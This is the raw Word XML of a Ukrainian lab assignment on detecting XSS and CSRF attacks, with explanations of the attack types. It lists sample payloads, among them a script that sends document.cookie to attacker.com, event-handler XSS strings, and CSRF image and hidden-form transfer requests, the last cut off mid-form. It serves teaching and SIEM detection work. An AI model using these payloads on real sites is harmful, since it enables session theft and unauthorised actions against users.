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55B41" w14:textId="2F4AF62A" w:rsidR="003B270F" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="002D3E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3719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</w:t>
      </w:r>
      <w:r w:rsidR="002D3E8D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222F37DC" w14:textId="44FD57BF" w:rsidR="00E53719" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E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ВИЯВЛЕННЯ ТА АНАЛІЗ ВЕБ-АТАК ТИПУ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CROSS</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8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SITE</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E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SCRIPTING</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E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XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D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CROSS-SITE REQUEST FORGERY (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199CCD84" w14:textId="1C029659" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E5371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719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</w:p>
    <w:p w14:paraId="2A4E9419" w14:textId="6BB0803B" w:rsidR="00E53719" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="36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Дослідити механізми виникнення вразливостей типу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cross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Scripting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Cross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Request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Forgery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веб-додатках, а також проаналізувати </w:t>
      </w:r>
      <w:r w:rsidR="00674968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">принципи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>їх експлуатації.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65602968" w14:textId="4986BA83" w:rsidR="00E53719" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="36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Набути практичних навичок виконання та дослідження атак </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reflected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Stored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вразливому веб-додатку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F9EFF0" w14:textId="7261F9EC" w:rsidR="00E53719" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="36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з процесом моніторингу та виявлення атак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системі централізованого аналізу журналів подій та </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SIEM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навчитися створювати та аналізувати власні правила виявлення веб-атак.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B871DBE" w14:textId="6EFF9897" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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3719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14:paraId="5E8DC19B" w14:textId="4B8EF55F" w:rsidR="00E53719" w:rsidRPr="002B648E" w:rsidRDefault="002B648E" w:rsidP="002B648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64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</w:t>
      </w:r>
      <w:r w:rsidRPr="002B648E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11330CEB" w14:textId="314FE210" w:rsidR="00E53719" w:rsidRDefault="002B648E" w:rsidP="002B6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Cross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Scripting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тип атаки на веб-додатки, за якого зловмисник впроваджує шкідливий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код у веб-сторінку, що переглядається іншими користувачами. У результаті виконання такого коду в браузері жертви зловмисник може отримати доступ до конфіденційних даних або виконувати дії від імені користувача.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A05ED2" w14:textId="560507D9" w:rsidR="002B648E" w:rsidRDefault="002B648E" w:rsidP="002B6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Наслідками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2B64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атаки можуть бути:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0AFF67" w14:textId="1F7EE03C" w:rsidR="002B648E" w:rsidRDefault="002B648E" w:rsidP="002B64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Викрадення сесійних токенів (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookies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session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16D1791" w14:textId="48C25C18" w:rsidR="002B648E" w:rsidRDefault="002B648E" w:rsidP="002B64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Перенаправлення користувачів на фішингові або шкідливі веб-ресурси.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6353D6D7" w14:textId="5B7DF349" w:rsidR="002B648E" w:rsidRDefault="002B648E" w:rsidP="002B64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Модифікація вмісту веб-сторінки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EB1F60" w14:textId="444816B1" w:rsidR="002B648E" w:rsidRDefault="002B648E" w:rsidP="002B648E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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дій у веб-додатку від імені користувача без його відома.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9B4A49" w14:textId="28FD9473" w:rsidR="002B648E" w:rsidRDefault="002B648E" w:rsidP="002B6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типи </w:t>
      </w:r>
      <w:r w:rsidRPr="00C07AE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS-</w:t>
      </w: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>атак</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2334C0BE" w14:textId="42D32665" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07A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Reflected</w:t>
      </w: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XSS</w:t>
      </w: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це тип атаки, за якого шкідливий скрипт передається до веб-додатку через параметри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-запиту (наприклад,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07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або форму) і одразу відображається у відповіді сервера без належної фільтрації.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3974BF5E" w14:textId="6B5FAC2A" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07A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Основні особливості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Reflected XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505CAB49" w14:textId="52E61F70" w:rsidR="00C07AE3" w:rsidRPr="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Шкідливий код передається через параметри запиту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6150ED9E" w14:textId="6AC17875" w:rsidR="00C07AE3" w:rsidRPr="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Виконується одразу після завантаження сторінки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B371F23" w14:textId="0E4D4353" w:rsidR="00C07AE3" w:rsidRPr="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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зберігається на сервері.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451C9155" w14:textId="000621B0" w:rsidR="00C07AE3" w:rsidRPr="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Зазвичай потребує соціальної інженерії (жертва повинна перейти за спеціально сформованим посиланням).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064702DB" w14:textId="05127379" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE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Stored</w:t>
      </w:r>
      <w:r w:rsidRPr="00C07A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XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C07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7AE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це вразливість, яка дозволяє зловмиснику назавжди зберегти шкідливий код на сервері (у базі даних, файловій системі тощо), після чого він автоматично виконується у браузерах усіх відвідувачів сторінки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE4891A" w14:textId="5DBC8E2C" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE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особливості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Stored XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A71636" w14:textId="038CB3AB" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Шкідливий код зберігається у базі даних або інших сховищах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D550DB" w14:textId="1FF1770F" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Виконується у браузерах усіх користувачів, які переглядають уражену сторінку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D712ADB" w14:textId="196FC4D1" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 одним з найбільш небезпечних типів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>-атак.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE38CD" w14:textId="123E23F8" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE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DOM</w:t>
      </w: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based</w:t>
      </w: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це виключно клієнтська вразливість, за якої виконання шкідливого коду відбувається через некоректну обробку даних скриптами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C07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в браузері, що призводить до небезпечних змін у структурі </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00C07A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F69CCF" w14:textId="3F19C348" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE3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особливості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DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00C07A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C07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C07AE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A657513" w14:textId="34D0F8AC" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Атака виконується повністю на стороні клієнта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0B6F9" w14:textId="1626F740" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Сервер може не фіксувати сам факт атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE81289" w14:textId="2863864C" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07AE3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Використовуються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-операції над </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-структурою сторінки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D23DEDD" w14:textId="7FF46C80" w:rsidR="00C07AE3" w:rsidRPr="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07A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Приклади </w:t>
      </w:r>
      <w:r w:rsidRPr="00C07AE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS-</w:t>
      </w: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>експлойтів</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EFE1E3" w14:textId="5046DD9F" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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Простий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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-виклик:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E506660" w14:textId="4ED946A3" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176ABAB5" w14:textId="75BC2B62" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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Викрадення </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57560A51" w14:textId="02A73593" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:r>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>steal</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>='+</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B41959" w14:textId="74051944" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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Stored 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тег </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>img:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C9C963" w14:textId="0508A3B9" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;img src=x onerror="alert('XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DF7F4D" w14:textId="78D7ACAF" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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обробник подій:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AAA696" w14:textId="77777777" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;body onload="alert('XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D9E7A" w14:textId="7E79CE9F" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;div onmouseover="alert('XSS')"&gt;Hover me&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329031E9" w14:textId="752A9A99" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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DOM-based XSS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F70407F" w14:textId="152E0088" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.write(location.hash.substring(1))&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2098DD4B" w14:textId="2E481922" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="00C07A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7A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</w:t>
      </w:r>
      <w:r w:rsidRPr="00C07AE3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSRF (Cross-Site Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF8FD3A" w14:textId="090BA8CF" w:rsidR="00C07AE3" w:rsidRDefault="00C07AE3" w:rsidP="002D3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Cross-Site Request Forgery (CSRF)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тип атаки, під час якої зловмисник змушує автентифікованого користувача виконати небажаний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP-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 до веб-додатку.</w:t>
      </w:r>
      <w:r w:rsidR="002D3E8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Оскільки браузер автоматично додає до запитів сесійні </w:t>
      </w:r>
      <w:r w:rsidR="002D3E8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r w:rsidR="002D3E8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, сервер сприймає такий запит як легітимний.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F57D5A8" w14:textId="57DF489E" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3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допомогою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 w:rsidRPr="002D3E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атаки зловмисник може:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF1BE73" w14:textId="32ADE5D6" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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Змінювати налаштування облікового запису.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54571E27" w14:textId="76AE30E7" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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Змінювати пароль користувача.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1397158B" w14:textId="78C909B4" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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Здійснювати фінансові операції.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53863B85" w14:textId="4C4358EA" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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Виконувати привілейовані дії від імені адміністратора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB6F042" w14:textId="3F9B69D1" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E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Приклади </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSRF-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>експлойтів</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B23E9C" w14:textId="525329FA" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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GET-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запит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4187F9" w14:textId="5175CB08" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;img src="http://vulnerable-site.com/change-email?email=attacker@evil.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3394FF" w14:textId="7193E2EE" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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автоматичну </w:t>
      </w:r>
      <w:r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2D3E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форму:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FE1E93" w14:textId="77777777" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;form action="http://bank.com/transfer" method="POST" id="csrf"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E7E9B5" w14:textId="77777777" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;input type="hidden" name="to" value="attacker"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFDABB4" w14:textId="77777777" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;input type="hidden" name="amount" value="10000"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B10843" w14:textId="77777777" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
